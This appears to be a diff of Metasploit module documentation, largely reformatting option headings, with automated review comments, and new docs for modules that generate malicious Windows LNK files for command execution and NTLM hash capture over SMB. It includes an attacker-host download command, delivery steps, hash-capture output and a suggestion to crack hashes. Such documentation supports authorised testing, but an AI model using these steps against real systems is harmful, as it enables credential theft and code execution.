[+] Account test_user/test_password created successfully.
[*] Auxiliary module execution completed
msf auxiliary(admin/hp/hp_ilo_create_admin_account) >
```
```
@@ -23,7 +23,7 @@
## Options
**rport**
### rport
The default is set to `8180`, which is only default on FreeBSD. All other operating systems, and the software itself, default to `8080`.
@@ -10,11 +10,11 @@ To exploit the vulnerability, the module generates requests and sets a value for
## Options
**PATTERN1** and **PATTERN2**
### PATTERN1 and PATTERN2
These patterns are used to determine whether the news articles have been reordered. By default, the module will search for headlines and set the first identified headline to PATTERN1 and the second to PATTERN2.
**ID**
### ID
The value for query parameter `id` of the page that the news extension is running on.
@@ -22,7 +22,7 @@ Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative pa
## Options
**PATH**
### PATH
This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)
@@ -22,18 +22,18 @@ The required options are based on the action being performed:
- When changing a password, you must specify the `LDAPUsername` and `LDAPPassword`, even if using an existing session (since the API requires both of these to be specified, even for open LDAP sessions)
- The `NEW_PASSWORD` option must always be provided
**LDAPUsername**
### LDAPUsername
The username to use to authenticate to the server. Required for changing a password, even if using an existing session.
**LDAPPassword**
### LDAPPassword
The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).
**TARGET_USER**
### TARGET_USER
For resetting passwords, the user account for which to reset the password. The authenticated account (username) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)
**NEW_PASSWORD**
### NEW_PASSWORD
The new password to set.
The new password to set.
@@ -9,15 +9,15 @@ Windows is the most ideal target because it supports WPAD by default.
## Options
**NBADDR**
### NBADDR
The address that the NetBIOS name (NBNAME) should resolve to.
**NBNAME**
### NBNAME
The NetBIOS name to spoof a reply for.
**PPSRATE**
### PPSRATE
The rate at which to send NetBIOS replies.
@@ -25,19 +25,19 @@ List the steps needed to make sure this thing works
## Options
**RHOSTS**
### RHOSTS
Set the target host.
**USERNAME**
### USERNAME
Set the USERNAME of the admin account you want to add.
**PASSWORD**
### PASSWORD
Set the PASSWORD of the admin account you want to add.
**RETRIES**
### RETRIES
You can change the maximum number of attempts to add an admin account by using `set RETRIES <max_retries>`.
@@ -19,10 +19,10 @@
## Options
**SQL**
### SQL
The SQL that will execute with the privileges of the user who created the index. Default is to escalate privileges.
**TABLE**
### TABLE
Table to create the index on.
@@ -103,11 +103,7 @@
## Options
**RHOST**
Target device.
**FUNCTION**
### FUNCTION
Either CREDS (default) or ENUM:
* CREDS attempts to retrieve administrative password and SNMP community strings
@@ -174,4 +170,4 @@ if response[0] == "\x81" && response[14..16] == "\x00\x90\xe8" && response.lengt
```
Note that the above response is an example of the utility of using ENUM. This function code (0x14) returns a netstat-type response. Output similar to the above will be displayed for every function code that does not return 'invalid' (0x4). This may also be useful for devices that do not "unlock" using the function codes supplied in this module; by running through all function codes in sequence, it is likely that an alternate "unlock" function will be sent prior to any function codes that request credentials.
NOTE: As the protocol is undocumented and the purpose of a majority of the function codes are unknown, undesired results are possible. Do NOT use on devices which are mission-critical!
NOTE: As the protocol is undocumented and the purpose of a majority of the function codes are unknown, undesired results are possible. Do NOT use on devices which are mission-critical!
@@ -89,7 +89,7 @@ The CPU mode uses a TCP port depending on the PLC Type, the module will
automatically detect the type and port to use, but can be overridden with the
'RPORT' option, however no real reason to configure it. If you accidentally set RPORT, you can unset it with the ```unset RPORT``` command.
**The ACTION option**
### ACTION
Action has four possible values:
@@ -25,22 +25,22 @@ The required options are based on the action being performed:
- When resetting or changing a password, you must specify `NEW_PASSWORD`
- When resetting or changing an NTLM hash, you must specify `NEW_NTLM`
**SMBUser**
### SMBUser
The username to use to authenticate to the server. Required for changing a password, even if using an existing session.
**SMBPass**
### SMBPass
The password to use to authenticate to the server, prior to performing the password modification. Required for changing a password, even if using an existing session (since the server requires proof that you know the existing password).
**TARGET_USER**
### TARGET_USER
For resetting passwords, the user account for which to reset the password. The authenticated account (SMBUser) must have privileges over the target user (e.g. Ownership, or the `User-Force-Change-Password` extended right)
**NEW_PASSWORD**
### NEW_PASSWORD
The new password to set for `RESET` and `CHANGE` actions.
**NEW_NTLM**
### NEW_NTLM
The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
The new NTLM hash to set for `RESET_NTLM` and `CHANGE_NTLM` actions. This can either be an NT hash, or a colon-delimited NTLM hash.
@@ -41,23 +41,23 @@ msf exploit(psexec) > exploit
By default, using auxiliary/admin/smb/ms17_010_command can be as simple as setting the RHOSTS option, and you're ready to go.
**The NAMEDPIPE Option**
### The NAMEDPIPE Option
By default, the module will scan for a list of common pipes for any available one. You can specify one by name.
**The LEAKATTEMPTS Option**
### The LEAKATTEMPTS Option
Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try.
**The DBGTRACE Option**
### The DBGTRACE Option
Used to debug, gives extremely verbose information.
**The SMBUser Option**
### The SMBUser Option
This is a valid Windows username.
**The SMBPass option**
### The SMBPass option
This can be either the plain text version or the Windows hash.
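Review bot: the renamed headings keep the "The ... Option" wording (`### The NAMEDPIPE Option`, `### The SMBPass option`) while every other file in this change normalizes option headings to the bare option name (`### NAMEDPIPE`, `### SMBPass`), and the casing of "Option" differs between `### The SMBUser Option` and `### The SMBPass option`. Suggest the bare-name form here for consistency.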
@@ -65,7 +65,7 @@ This can be either the plain text version or the Windows hash.
**Automatic Target**
There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the native upload. Each target is explained below.
**Powershell Target**
@@ -38,37 +38,37 @@ accordingly.
12. Apply the acquired session cookie for the vCenter host at the `/ui` path
## Options
**DOMAIN**
### DOMAIN
The vSphere SSO domain; by default this is `vsphere.local`. If this does not match the vSphere SSO
domain, the module will return `HTTP 400: Issuer not trusted` on execution.
**USERNAME**
### USERNAME
The target user within the SSO domain. This must be a valid user as vCenter will happily issue
SAML assertions for invalid usernames, but the provided session tokens will not function. There
should be no reason to modify the target user from the default `administrator` in most scenarios.
**RHOSTS**
### RHOSTS
The vCenter appliance IPv4 address or DNS FQDN. This must be reachable over HTTPS for the module
to function.
**VHOST**
### VHOST
The fully qualified DNS name of the vCenter appliance; this must be present in the Issuer element
of the assertion for the module to function. If this value does not match the vCenter appliance
FQDN, the module will return `HTTP 400` during the initial `GET` request.
**VC_IDP_CERT**
### VC_IDP_CERT
The filesystem path to the vCenter SSO IdP certificate in DER or PEM format.
**VC_IDP_KEY**
### VC_IDP_KEY
The filesystem path to the vCenter SSO IdP private key in DER or PEM format.
**VC_VMCA_CERT**
### VC_VMCA_CERT
The filesystem path to the vCenter VMCA certificate in DER or PEM format.
@@ -30,15 +30,15 @@ value is provided for `VC_IP` the module defaults to assigning the loopback IP `
7. Do: `dump`
## Options
**VMDIR_MDB**
### VMDIR_MDB
Path to the vmdird MDB database file on the local system. Example: `/tmp/data.mdb`
**VMAFD_DB**
### VMAFD_DB
Path to the vmafd DB file on the local system. Example: `/tmp/afd.db`
**VC_IP**
### VC_IP
Optional parameter to set the IPv4 address associated with loot entries made by the module.
@@ -21,16 +21,16 @@ Stop Stop cooking
## Options
**TEMP**
### TEMP
Set this to the desired temperature for cooking. Valid values are `Off`,
`Warm`, `Low`, and `High`.
**TIME**
### TIME
Set this to the desired cook time in full minutes.
**DefangedMode**
### DefangedMode
Set this to `false` to disable defanged mode and enable module
functionality. Set this only if you're SURE you want to proceed.
@@ -12,7 +12,7 @@ Tested with Schneider TM221CE16R
## Options
**MODE**
### MODE
Default: UPLOAD. Changes offset within a packet that is used to check for a zip header.
@@ -47,12 +47,12 @@ on setting up the [BAFX 34t5](https://bafxpro.com/products/obdreader) with Kali
## Options
**TARGETURI**
### TARGETURI
Specifies the base target URI to communicate to the HWBridge API. By default this is '/' but it
could be things such as '/api' or the randomly generated URI from the local_hwbridge module
**DEBUGJSON**
### DEBUGJSON
Prints out all the JSON packets that come from the HWBridge API. Useful for troubleshooting
a device.
@@ -8,7 +8,7 @@ mail services such as Gmail, Yahoo, Live should work fine.
## Options
**CELLNUMBERS**
### CELLNUMBERS
The 10-digit phone number (or numbers) you want to send the MMS text to. If you wish to target
against multiple phone numbers, ideally you want to create the list in a text file (one number per
@@ -20,12 +20,12 @@ set CELLNUMBERS file:///tmp/att_phone_numbers.txt
Remember that these phone numbers must be the same carrier.
**MMSCARRIER**
### MMSCARRIER
The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
supported carriers.
**TEXTMESSAGE**
### TEXTMESSAGE
The text message you want to send. For example, this will send a text with a link to google:
@@ -35,11 +35,11 @@ set TEXTMESSAGE "Hi, please go: google.com"
The link should automatically be parsed on the phone and clickable.
**MMSFILE**
### MMSFILE
The attachment to send in the message.
**MMSFILECTYPE**
### MMSFILECTYPE
The content type to use for the attachment. Commonly supported ones include:
@@ -51,28 +51,28 @@ The content type to use for the attachment. Commonly supported ones include:
To find more, please try this [list](http://www.freeformatter.com/mime-types-list.html)
**SMTPADDRESS**
### SMTPADDRESS
The mail server address you wish to use to send the MMS messages.
**SMTPPORT**
### SMTPPORT
The mail server port. By default, this is ```25```.
**SMTPUSERNAME**
### SMTPUSERNAME
The username you use to log into the SMTP server.
**SMTPPASSWORD**
### SMTPPASSWORD
The password you use to log into the SMTP server.
**SMTPFROM**
### SMTPFROM
The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```. Some carriers require this
in order to receive the text, such as AT&T.
**MMSSUBJECT**
### MMSSUBJECT
The MMS subject. Some carriers require this in order to receive the text, such as AT&T.
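Review bot: the SMTPFROM paragraph in context says "it may be used as ```SMTPUSER```", but the option documented a few entries above is `SMTPUSERNAME`; since this section is being reformatted anyway, fix the option name so readers do not look for a setting that does not exist.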
@@ -8,7 +8,7 @@ mail services such as Gmail, Yahoo, Live should work fine.
## Options
**CELLNUMBERS**
### CELLNUMBERS
The 10-digit phone number (or numbers) you want to send the text to. If you wish to target against
multiple phone numbers, ideally you want to create the list in a text file (one number per line),
@@ -20,16 +20,16 @@ set CELLNUMBERS file:///tmp/att_phone_numbers.txt
Remember that these phone numbers must be the same carrier.
**SMSCARRIER**
### SMSCARRIER
The carrier that the targeted numbers use. See **Supported Carrier Gateways** to learn more about
supported carriers.
**SMSSUBJECT**
### SMSSUBJECT
The text subject.
**SMSMESSAGE**
### SMSMESSAGE
The text message you want to send. For example, this will send a text with a link to google:
@@ -39,23 +39,23 @@ set SMSMESSAGE "Hi, please go: google.com"
The link should automatically be parsed on the phone and clickable.
**SMTPADDRESS**
### SMTPADDRESS
The mail server address you wish to use to send the text messages.
**SMTPPORT**
### SMTPPORT
The mail server port. By default, this is ```25```.
**SMTPUSERNAME**
### SMTPUSERNAME
The username you use to log into the SMTP server.
**SMTPPASSWORD**
### SMTPPASSWORD
The password you use to log into the SMTP server.
**SMTPFROM**
### SMTPFROM
The FROM field of SMTP. In some cases, it may be used as ```SMTPUSER```.
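Review bot: same `SMTPUSER` vs `SMTPUSERNAME` mismatch as in the MMS module doc; the context line should reference `SMTPUSERNAME`, the option defined four entries above.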
@@ -73,7 +73,6 @@ The module supports the following carriers:
* Virgin Mobile
**Note:** During development, we could not find a valid gateway for Sprint, therefore it is currently
not supported.
### Finding the Carrier for a Phone Number
@@ -24,13 +24,13 @@ This module authenticates to AWS EC2 (Elastic Compute Cloud) to identify compute
## Options
**ACCESS_KEY_ID**
### ACCESS_KEY_ID
This AWS credential is like a username. It uniquely identifies the user, and is paired with a 'secret access key'. The access key ID is retrievable through the AWS console.
An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`
**SECRET_ACCESS_KEY**
### SECRET_ACCESS_KEY
This AWS credential is like a password, and should be treated as such. It is paired with a 'access key ID'. The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
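Review bot: the SECRET_ACCESS_KEY context paragraph says "The access key ID cannot be retrieved from AWS after it has been generated", but it is the secret access key that AWS never shows again; the preceding paragraph correctly states that the access key ID is retrievable through the console. The sentence should read "The secret access key cannot be retrieved from AWS after it has been generated ...". Also "a 'access key ID'" should be "an 'access key ID'". The same text is repeated in the IAM and S3 module docs in this change.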
@@ -23,25 +23,25 @@ This module authenticates to AWS IAM (Identify Access Module) to identify user a
## Options
**ACCESS_KEY_ID**
### ACCESS_KEY_ID
This AWS credential is like a username. It uniquely identifies the user, and is paired with a 'secret access key'. The access key ID is retrievable through the AWS console.
An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`
**SECRET_ACCESS_KEY**
### SECRET_ACCESS_KEY
This AWS credential is like a password, and should be treated as such. It is paired with a 'access key ID'. The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF\2dq3SbDsQj4jdyOMOv`.
**REGION**
### REGION
AWS resources are located in regions. Optionally, this module's output can be filtered based on region to minimize the query to AWS. Alternatively, `REGION` can be left blank, such that all regions will be checked.
An example region would be `us-west-2`.
**LIMIT**
### LIMIT
Some AWS API calls support limiting output, such that the module will only return the number of instances, without detailing the configuration of each instance. Optionally, this module's output can be filtered to minimize the query to AWS and the user output. Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
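Review bot: the hunk header context reads "AWS IAM (Identify Access Module)"; the service is Identity and Access Management. The LIMIT paragraph says "all EC2 instances will be detailed", which is carried over from the EC2 module doc and does not fit an IAM user enumeration module. The example `SECRET_ACCESS_KEY` contains a backslash (`...TAZfF\2dq3...`) where the S3 doc spells the same sample with `/`; a backslash is not part of the character set AWS uses for these keys, so the `/` form is the right one. The SECRET_ACCESS_KEY paragraph also has the same access-key-ID / secret-key mix-up noted for the EC2 doc.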
@@ -24,19 +24,19 @@ This module authenticates to AWS S3 (Simple Storage Service), to identify bucket
## Options
**ACCESS_KEY_ID**
### ACCESS_KEY_ID
This AWS credential is like a username. It uniquely identifies the user, and is paired with a 'secret access key'. The access key ID is retrievable through the AWS console.
An example `ACCESS_KEY_ID` would be `AKIA5C76TR3KXHXA5CRC`
**SECRET_ACCESS_KEY**
### SECRET_ACCESS_KEY
This AWS credential is like a password, and should be treated as such. It is paired with a 'access key ID'. The access key ID cannot be retrieved from AWS after it has been generated, but it may be discoverable through environment variables, configuration files, source code, or backups.
An example `SECRET_ACCESS_KEY` would be `EKfx3wOWWiGk1WgBTAZfF/2dq3SbDsQj4jdyOMOv`.
**REGION**
### REGION
AWS resources are located in regions. Optionally, this module's output can be filtered based on region to minimize the query to AWS. Alternatively, `REGION` can be left blank, such that all regions will be checked.
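Review bot: same issue as the EC2 and IAM docs: the SECRET_ACCESS_KEY paragraph says the access key ID cannot be retrieved after generation, when it is the secret access key that cannot, and "a 'access key ID'" should read "an 'access key ID'".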
@@ -21,7 +21,7 @@
## Options
**TARGETURI**
### TARGETURI
The URI where the multipart form is located. There is no real default and this will change based on the application.
@@ -93,4 +93,4 @@ msf auxiliary(apache_commons_fileupload_dos) > run
```
![tomcat7_dos](https://cloud.githubusercontent.com/assets/752491/22169486/71980e2e-df42-11e6-8353-4f1e260375ee.png)
@@ -8,23 +8,23 @@ Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more info
## Options
**WS_USERNAME**
### WS_USERNAME
This is the basic auth username for the spectrum analysis web service. This is typically default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`. This will vary from manufacturer to manufacturer and ISP to ISP.
**WS_PASSWORD**
### WS_PASSWORD
This is the basic auth password for the spectrum analysis web service.
**TIMEOUT**
### TIMEOUT
This is the timeout in seconds that the module should wait before making a conclusion on the success of the payload delivery. Typically, the device crashes within about 5 second of the payload being delivered. The default value of `15` should be seen as the lower bound for `TIMEOUT` values.
**RHOSTS**
### RHOSTS
Typically the only address which should be used for this value is `192.168.100.1`. It can be different, but not in a well-secured configuration.
**RPORT**
### RPORT
On some devices the Spectrum Analysis web service runs on port `8080`, though Lyrebirds (the original discoverer and PoC author) notes that sometimes it can run on port `6080`.
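Review bot: Under `### TIMEOUT`, "within about 5 second" should be "5 seconds". The `### RHOSTS` sentence "It can be different, but not in a well-secured configuration" reads backwards; say plainly that `192.168.100.1` is the modem's conventional LAN-side management address and that other addresses are only seen on non-default setups. Under `### WS_USERNAME`, `admin:password` is a user:password pair, not a username; split it or say "such as `admin` with password `password`".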
@@ -12,16 +12,22 @@
## Options
**DOSTYPE**
### DOSTYPE
GENTLE: *Current sessions will continue to work, but not future ones*
A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
#### GENTLE
SOFT: *No past or future sessions will work*
A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
*Current sessions will continue to work, but not future ones*
A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work.
HARD: *ReDOS or Catastrophic Regex Backtracking*
A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
#### SOFT
*No past or future sessions will work*
A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer.
#### HARD
*ReDOS or Catastrophic Regex Backtracking*
A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption.
## Scenarios
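Review bot: The GENTLE paragraph is a run-on: "will be used as regex rule it is possible then to make a valid regex rule" needs a full stop or semicolon after "regex rule", and "as regex rule" should be "as a regex rule". The new `#### SOFT` text says "when looking an appropriate resource" (missing "for"), and the three sections alternate between "sanitation" and "sanitization"; pick one. `*ReDOS or Catastrophic Regex Backtracking*` should read `ReDoS`.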
@@ -19,15 +19,15 @@ FoxIT after version 9.1 is no longer vulnerable.
## Options
**FILENAME**
### FILENAME
This option allows you to customise the generated filename.
This can be changed using set FILENAME test.pdf
**LHOST**
### LHOST
This option allows you to set the IP address of the SMB Listener that the document points to
This can be changed using set LHOST 192.168.1.25
**PDFINJECT**
### PDFINJECT
This option allows you to inject the UNC code into an existing PDF document
This can be changed using set PDFINJECT /path/to/file/pdf.pdf
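Review bot: The three "This can be changed using set ..." lines put the `set` commands in plain text; the other option docs in this change (for example the CREATOR/FILENAME/LHOST hunk below) put them in fenced blocks, so use the same form here, and end the option sentences with periods ("...the SMB Listener that the document points to" and "...into an existing PDF document" have none).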
@@ -89,4 +89,4 @@ msf auxiliary(fileformat/badpdf) > exploit
[\*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) >
```
```
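Review bot: Inside the fenced transcript, `[\*] Auxiliary module execution completed` keeps a literal backslash because markdown escapes are not processed in code fences; write `[*]` so the line matches what msfconsole prints.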
@@ -0,0 +1,94 @@
## Vulnerable Application
Windows systems where LNK files are processed, such as in Explorer or when shortcuts are executed.
This can lead to arbitrary command execution via manipulated command line buffers.
References:
- [ZDI-CAN-25373](https://www.zerodayinitiative.com/advisories/ZDI-CAN-25373/)
- [Windows LNK Research](https://zeifan.my/Windows-LNK/)
- [Gist Example](https://gist.github.com/nafiez/1236cc4c808a489e60e2927e0407c8d1)
- [Trend Micro Analysis](https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html)
Disclosure Date: 2025-07-19.
## Verification Steps
1. Start msfconsole.
1. Load the module: `use auxiliary/fileformat/windows_lnk_padding`.
1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or BUFFER_SIZE.
1. Execute the module: `run`.
1. A malicious LNK file will be generated.
1. Deliver the LNK file to the target Windows system.
1. Open the LNK file to trigger command execution (e.g., launching calc.exe).
## Options
### COMMAND
The command to execute when the LNK is opened.
Default: `C:\\Windows\\System32\\calc.exe`
Example:
```
set COMMAND powershell.exe -c "Invoke-WebRequest -Uri http://attacker.com/payload"
```
### DESCRIPTION
Optional description for the LNK file. If not set, a random sentence is generated.
Example:
```
set DESCRIPTION Important Document
```
### ICON_PATH
Optional path to an icon for the LNK file. If not set, a random system icon path is generated.
Example:
```
set ICON_PATH %SystemRoot%\\System32\\shell32.dll
```
### BUFFER_SIZE
The size of the whitespace padding buffer before the command (must be sufficient to avoid truncation).
Default: 900
Example:
```
set BUFFER_SIZE 1000
```
## Scenarios
### Basic Command Execution on Windows
Target: Any Windows system (e.g., Windows 10 or later).
Generate an LNK that launches Calculator with custom padding:
```
msf > use auxiliary/fileformat/windows_lnk_padding
msf auxiliary(fileformat/windows_lnk_padding) > set FILENAME calc.lnk
FILENAME => calc.lnk
msf auxiliary(fileformat/windows_lnk_padding) > set COMMAND C:\\Windows\\System32\\calc.exe
COMMAND => C:\\Windows\\System32\\calc.exe
msf auxiliary(fileformat/windows_lnk_padding) > set BUFFER_SIZE 900
BUFFER_SIZE => 900
msf auxiliary(fileformat/windows_lnk_padding) > set DESCRIPTION Calculator Shortcut
DESCRIPTION => Calculator Shortcut
msf auxiliary(fileformat/windows_lnk_padding) > set ICON_PATH %SystemRoot%\\System32\\calc.exe
ICON_PATH => %SystemRoot%\\System32\\calc.exe
msf auxiliary(fileformat/windows_lnk_padding) > run
[*] Generating LNK file: calc.lnk
[+] Successfully created calc.lnk
[*] Command line buffer size: 900 bytes
[*] Target command: C:\\Windows\\System32\\calc.exe
[*] Auxiliary module execution completed
```
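Review bot: FILENAME is listed in verification step 3 and used in the scenario (`set FILENAME calc.lnk`) but has no `### FILENAME` entry under Options; add one with its default. The `set COMMAND powershell.exe -c "Invoke-WebRequest -Uri http://attacker.com/payload"` example points at a real registered domain; use a reserved one such as `example.com`. The double backslashes in `C:\\Windows\\System32\\calc.exe` and `%SystemRoot%\\System32\\shell32.dll` are inside code spans and fences, where backslashes are literal, so the doc (and the transcript lines `COMMAND => C:\\Windows\\System32\\calc.exe`) show paths a reader would have to un-escape; use single backslashes. Also check `Disclosure Date: 2025-07-19` against the Trend Micro reference, whose URL path (`research/25/c/`) suggests a March 2025 publication.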
@@ -0,0 +1,104 @@
## Vulnerable Application
Windows systems where LNK files are processed in Explorer, particularly during right-click actions that load context menus.
This can result in NTLM credential leaks over SMB.
References:
- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
Disclosure Date: 2025-05-06.
## Verification Steps
1. Start msfconsole.
1. Load the module: `use auxiliary/fileformat/right_click_lnk_leak`.
1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or PADDING_SIZE.
1. Execute the module: `run`.
1. A malicious LNK file is generated.
1. Set up an SMB capture listener (e.g., `auxiliary/server/capture/smb`).
1. Deliver the LNK file to the target system.
1. Right-click the LNK file in Explorer to trigger the SMB connection.
1. Monitor the listener for captured NTLM hashes.
## Options
### DESCRIPTION
The description for the shortcut.
Default: `Testing Purposes`
Example:
```
set DESCRIPTION Important File
```
### ICON_PATH
The path to an icon for the LNK file.
Default: `e.g. abc.ico`
Example:
```
set ICON_PATH %SystemRoot%\\System32\\shell32.dll
```
### PADDING_SIZE
Size of padding in the command arguments.
Default: 10
Example:
```
set PADDING_SIZE 20
```
## Scenarios
### NTLM Hash Capture on Right-Click
Target: Windows system with Explorer (e.g., Windows 10 or later).
Generate the LNK file:
```
msf > use auxiliary/fileformat/right_click_lnk_leak
msf auxiliary(fileformat/right_click_lnk_leak) > set DESCRIPTION Fake Document
DESCRIPTION => Fake Document
msf auxiliary(fileformat/right_click_lnk_leak) > set ICON_PATH %SystemRoot%\\System32\\imageres.dll
ICON_PATH => %SystemRoot%\\System32\\imageres.dll
msf auxiliary(fileformat/right_click_lnk_leak) > set PADDING_SIZE 15
PADDING_SIZE => 15
msf auxiliary(fileformat/right_click_lnk_leak) > run
[*] Creating 'context.lnk' file...
[+] LNK file created: context.lnk
[*] Set up a listener (e.g., auxiliary/server/capture/smb) to capture the authentication
[*] Auxiliary module execution completed
```
Set up the capture listener on the attacker machine:
```
msf > use auxiliary/server/capture/smb
msf auxiliary(server/capture/smb) > set SRVHOST 192.168.1.25
SRVHOST => 192.168.1.25
msf auxiliary(server/capture/smb) > run
[*] Server started.
```
Deliver `context.lnk` to the target. When the victim right-clicks it, an SMB connection is attempted:
```
[*] SMB Captured - 2025-09-18 21:08:00 +0530
NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
USER:targetuser DOMAIN:TARGETPC OS: Windows 10 LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:examplehashvalue
NT_CLIENT_CHALLENGE:examplechallenge
```
Use cracking tools to recover credentials from the hash.
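Review bot: `Default: \`e.g. abc.ico\`` under `### ICON_PATH` reads like a placeholder copied from the option description rather than the actual default; state the real default or "none". FILENAME appears in step 3 and the output (`Creating 'context.lnk' file...`) but is not documented under Options. The ICON_PATH sentence also lacks whether the icon path is what triggers the SMB connection, which is the point of the module; one sentence tying the option to the leak would help.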
@@ -0,0 +1,88 @@
## Vulnerable Application
Windows systems using Explorer to browse directories with LNK files, where the IconEnvironmentDataBlock can force SMB authentication leaks.
References:
- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
Disclosure Date: 2025-05-16.
## Verification Steps
1. Start msfconsole.
1. Load the module: `use auxiliary/fileformat/iconenvironmentdatablock_lnk`.
1. Set options like FILENAME, or others as needed.
1. Execute the module: `run`.
1. A malicious LNK file is generated.
1. Place the LNK in a target directory.
1. Browse the directory in Windows Explorer to trigger the SMB connection.
1. Check the console for captured NTLM hashes.
## Options
### DESCRIPTION
Optional description for the shortcut. If unset, a random sentence is generated.
Example:
```
set DESCRIPTION System Update
```
### ICON_PATH
Optional icon path for the LNK. If unset, a random system icon path is generated.
Example:
```
set ICON_PATH %SystemRoot%\\System32\\shell32.dll
```
### PADDING_SIZE
Size of padding in the command arguments.
Default: 10
Example:
```
set PADDING_SIZE 20
```
## Scenarios
### NTLM Hash Capture via Integrated Server
Target: Windows system with Explorer.
```
msf > use auxiliary/fileformat/iconenvironmentdatablock_lnk
msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set FILENAME leak.lnk
FILENAME => leak.lnk
msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set SRVHOST 192.168.1.25
SRVHOST => 192.168.1.25
msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set DESCRIPTION Fake Shortcut
DESCRIPTION => Fake Shortcut
msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set PADDING_SIZE 15
PADDING_SIZE => 15
msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > run
[*] Creating 'leak.lnk' file...
[+] LNK file created: leak.lnk
[*] Listening for hashes on 192.168.1.25:445
[*] Auxiliary module execution completed
```
Deliver `leak.lnk` to a target folder. Browsing the folder triggers an SMB connection:
```
[*] SMB Captured - 2025-09-18 21:07:00 +0530
NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
USER:victim DOMAIN:VICTIMPC OS: Windows 10 LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:samplehash
NT_CLIENT_CHALLENGE:samplechallenge
```
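Review bot: SRVHOST and FILENAME are set in the scenario (`set SRVHOST 192.168.1.25`, `set FILENAME leak.lnk`) and the module prints `Listening for hashes on 192.168.1.25:445`, yet neither option is documented and the verification steps never say that the module runs its own SMB capture server, which is what step 8 ("Check the console") relies on. Also `Disclosure Date: 2025-05-16` differs from the `2025-05-06` given for `right_click_lnk_leak` although both cite the same single reference; verify which date applies to this block type.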
@@ -20,21 +20,21 @@ without providing any warning to the user. This allows an attacker the opportuni
## Options
**CREATOR**
### CREATOR
This option allows you to customise the document author for the new document:
```
set CREATOR New_User
```
**FILENAME**
### FILENAME
This option allows you to customise the generated filename:
```
set FILENAME salary.odt
```
**LHOST**
### LHOST
This option allows you to set the IP address of the SMB Listener that the .odt document points to:
@@ -0,0 +1,72 @@
## Vulnerable Application
Windows operating systems that process LNK files via Explorer, particularly when browsing directories containing the malicious shortcut.
This can lead to NTLM credential leaks over SMB.
References:
- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
- [Exploit-DB 42382](https://www.exploit-db.com/exploits/42382)
Disclosure Date: 2025-05-10 (reported to MSRC).
## Verification Steps
1. Start msfconsole.
2. Load the module: `use auxiliary/fileformat/specialfolderdatablock_lnk`.
3. Customize options as needed (e.g., set FILENAME or APPNAME).
4. Execute the module: `run`.
5. A malicious LNK file will be generated.
6. If not using a custom UNCPATH, the module starts an SMB capture server automatically.
7. Place the LNK file in a directory on the target system.
8. Browse to the directory in Windows Explorer to trigger the SMB connection.
9. Monitor the console for captured NTLM hashes.
## Options
### APPNAME
Sets the display name of the application in the LNK file. If empty, a random name is generated.
Example:
```
set APPNAME FakeApp
```
## Scenarios
### Basic NTLM Hash Capture on Windows
Target: A Windows system with Explorer (e.g., Windows 10 or later).
Attacker: Use the module to generate the LNK and capture hashes locally.
```
msf > use auxiliary/fileformat/specialfolderdatablock_lnk
msf auxiliary(fileformat/specialfolderdatablock_lnk) > set FILENAME malicious.lnk
FILENAME => malicious.lnk
msf auxiliary(fileformat/specialfolderdatablock_lnk) > set SRVHOST 192.168.1.25
SRVHOST => 192.168.1.25
msf auxiliary(fileformat/specialfolderdatablock_lnk) > set APPNAME FakeApp
APPNAME => FakeApp
msf auxiliary(fileformat/specialfolderdatablock_lnk) > run
[*] Starting SMB server on 192.168.1.25:445
[*] Generating malicious LNK file
[+] malicious.lnk stored at /root/.msf4/local/malicious.lnk
